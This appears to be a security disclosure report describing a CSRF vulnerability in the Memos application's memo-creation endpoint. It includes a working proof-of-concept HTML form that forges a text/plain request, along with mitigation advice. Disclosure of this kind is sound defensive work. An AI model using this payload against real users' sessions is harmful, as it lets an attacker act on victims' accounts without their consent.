I have discovered in Memos a CSRF Vulnerability (in Create a Memo Functionality (POST /api/memo).
I have identified that it is possible to manipulate the actions of authenticated users by tricking them into clicking on a malicious link or visiting a malicious website while they are logged into Memos. This can allow an attacker to perform actions on behalf of the victim, such as creating or modifying memos.
To reproduce the vulnerability, I followed these steps:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:5230/api/memo" method="POST" enctype="text/plain">
<input type="hidden" name="{"content":"CSRF","visibility":"PRIVATE","resourceIdList":[]}" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
I have attached a proof-of-concept HTML file and a video demonstrating the vulnerability to this report.
The Cross-Site Request Forgery (CSRF) vulnerability in the application is occurring because the application is not validating the Content-Type to be of the type application/json and is allowing the submission of text/plain.
By allowing requests with text/plain as the Content-Type, the application is vulnerable to CSRF attacks
https://drive.google.com/file/d/10eIE2pXRcVDT1juyGu5_MSmvzgTmj_35/view?usp=sharing
I recommend that you take the following steps to mitigate this vulnerability:
Implement proper CSRF protection, such as including a unique token in all forms and verifing it on the server-side.
The application should validate the Content-Type of requests to ensure that they are of the correct type, such as application/json. This will prevent attackers from being able to leverage the vulnerability to perform unauthorized actions.